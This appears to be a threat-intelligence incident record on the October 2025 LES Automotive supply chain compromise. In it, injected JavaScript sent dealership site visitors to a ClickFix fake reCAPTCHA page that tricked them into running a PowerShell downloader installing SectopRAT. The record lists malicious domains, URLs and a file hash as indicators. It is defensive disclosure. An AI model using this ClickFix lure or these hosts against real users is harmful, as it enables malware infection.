Cyber Incident Victim: LES Automotive
Date:
Oct 2025
Location:
United States of America
Summary
A supply chain compromise of LES Automotive, a third‑party video service used by auto dealerships, led to the injection of malicious JavaScript that presented a ClickFix page, tricking visitors into executing PowerShell commands that downloaded and installed the SectopRAT remote access trojan. The attack used a fake reCAPTCHA prompt, contained Russian‑language comments in the code, affected over 100 dealership websites, and was later remediated by the service provider.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
The incident began when the third‑party video service domain associated with LES Automotive was compromised, allowing threat actors to inject malicious JavaScript into the file les_video_srp.js that was loaded by over one hundred auto dealership websites using the service. The injected script dynamically created a script element that fetched content from security‑confirmation.help/captchav2, which in turn redirected visitors to a ClickFix page hosted at deliveryoka.com/webservice_ionic/captchav2.html. On that page users were presented with a fake reCAPTCHA prompt that instructed them to perform a Windows Run command, paste a string from their clipboard, and execute it, thereby copying a PowerShell command to the clipboard and triggering its execution when the user followed the instructions. The PowerShell command downloaded a base64‑encoded payload from bitly.cx/UnluS, which redirected to main-login.sbs/maison/tree and subsequently fetched a second Bitly link that delivered a file named Lancaster.zip to the victim’s temporary folder. The ZIP archive was extracted and the executable zkwindow.exe was launched, leading to the installation of the SectopRAT remote access trojan on the compromised machine. Analysis of the malware in a Triage sandbox yielded a perfect threat score, confirming the presence of SectopRAT.
Indicators of compromise identified in the investigation included the domains security‑confirmation.help, deliveryoka.com, main-login.sbs, and bitly.cx, as well as the specific URLs for the ClickFix page, the PowerShell downloader, and the Lancaster.zip file, together with its SHA‑256 hash 1a34c9b4500cf7859c36c102209902202fb7188aca1ba759f2d5018bf2655cc1. The malicious JavaScript contained a Russian language comment reading “Очистите предыдущий таймаут,” which translates to “Clear the previous timeout,” and researchers noted that most urlscan.io captures showed a benign version of the script, indicating that the injection was performed dynamically and intermittently. The attack was active at least since April 2024, as evidenced by the last‑modified timestamp of the captchav2.html file on the compromised host, and it affected the websites of more than one hundred auto dealerships that relied on the LES Automotive video service.
In response to the discovery, LES Automotive remediated the compromised video service, removing the malicious JavaScript and restoring the legitimate version of les_video_srp.js. The remediation halted further delivery of the ClickFix payload to dealership visitors, and the IOCs were shared with security communities to enable blocking of the associated domains and file hashes. No additional details regarding post‑remediation monitoring or specific impact metrics were provided in the source material.